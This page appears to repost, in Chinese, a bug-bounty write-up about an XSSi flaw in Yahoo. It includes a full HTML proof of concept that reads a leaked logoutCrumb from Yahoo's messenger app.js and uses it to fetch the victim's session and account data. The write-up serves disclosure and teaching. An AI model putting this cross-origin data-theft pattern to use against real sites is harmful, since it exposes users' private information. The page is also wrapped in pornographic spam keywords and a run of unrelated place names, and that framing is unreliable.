亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

發布時間:2021-12-18 14:26:07 來源:億速云 閱讀:141 作者:柒染 欄目:網絡管理

本篇文章為大家展示了發現雅虎XSSi漏洞實現用戶信息竊取的示例分析,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

發現某種特定類別漏洞由兩個關鍵部分組成,那就是對漏洞的認知以及挖掘的難易程度。跨站腳本包含漏洞(XSSi)在公認的安全標準OWASP TOP 10中并未被提及,而且它也沒有一些公開可利用的工具。但它的影響涉及個人存儲信息泄露、token保護機制繞過以及賬戶劫持等。目前來說,由于XSSi漏洞存在廣泛且缺乏有效的檢測手段,導致其漏洞危害程度增加。下面我將分享我發現的一個雅虎XSSi漏洞,利用該漏洞可以實現對雅虎用戶的信息竊取。

端倪

在參與雅虎(Yahoo)漏洞眾測項目中,在我某次用BurpSuite來進行抓包分析時,偶然看到了以下這個請求:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

在我發現這是一個JSONP服務端之后,我立馬意識到這可能會形成一個XSSi漏洞(跨站腳本包含)。在雅虎網站API中,.crumb 值其實就是一個隨機字符串,它與用戶的session和身份驗證值相關,我注意到,如果在該請求中,GET參數 .crumb 值無效的話,其響應如下:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

利用

現在,我想,如果能以某種方式去竊取到受害者的有效.crumb 值的話,那么就能竊取到對方的具體賬號信息值了。因此,我就在BurpSuite的抓包中來查找所有包含有效 .crumb 值的請求,最終,我發現了在某個動態的Javascript文件存在這樣的信息,該Javascript文件位于https://messenger.yahoo.com/embed/app.js。如果你現在去檢查這個Javascript文件,你會發現它其中的    logoutCrumb 值已經被刪除修復了,我初次發現時,它的源代碼如下: 

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

現在,XSSi 漏洞原理其實是這樣的,它允許攻擊者繞過原始邊界竊取特定類型數據,利用了<script>標記的src屬性來突破同源策略( SOP),也即在<script>標記中,瀏覽器不會阻止網頁加載圖像和文字等第三方資源。因此,為了竊取    https://messenger.yahoo.com/embed/app.js中的有效回調 .crumb 值,然后把它放置在鏈接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中進行請求,以獲取到相關用戶的session信息,我編寫了如下PoC代碼:

<html>    <head>        <title>Yahoo XSSi PoC</title>    </head>    <body>               <div >            <h2 >Proof of Concept</h2>            <b>Dataset 1:</b>            <div id="content1" ></div>            <br/>            <b>Dataset 2:</b>            <div id="content2" ></div>        </div>        <script>            function processDeviceUsers(data) {                document.getElementById("content1").innerHTML = JSON.stringify(data);            }            window.onload = function () {                var config = {};                config_data = {};                config.merge = function(data) { config_data = data };                iris.initConfig(config);                document.getElementById("content2").innerHTML =  JSON.stringify(config_data);                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;                var s = document.createElement('script');                s.setAttribute('src', src);                document.body.appendChild(s);            }           </script>        <script src="https://messenger.yahoo.com/embed/app.js"></script>        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>    </body></html>

以下就是測試的效果圖:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

上述內容就是發現雅虎XSSi漏洞實現用戶信息竊取的示例分析,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

勃利县| 乌恰县| 石门县| 宁远县| 攀枝花市| 滁州市| 汝城县| 晋州市| 定西市| 博爱县| 龙井市| 汉沽区| 营口市| 兴国县| 从化市| 宁武县| 高邮市| 永春县| 铜梁县| 湟源县| 涞源县| 古交市| 彰化市| 沽源县| 论坛| 固阳县| 两当县| 武功县| 平果县| 怀集县| 孟州市| 通化市| 冕宁县| 安吉县| 乳源| 濮阳县| 古浪县| 漠河县| 九寨沟县| 东台市| 西安市|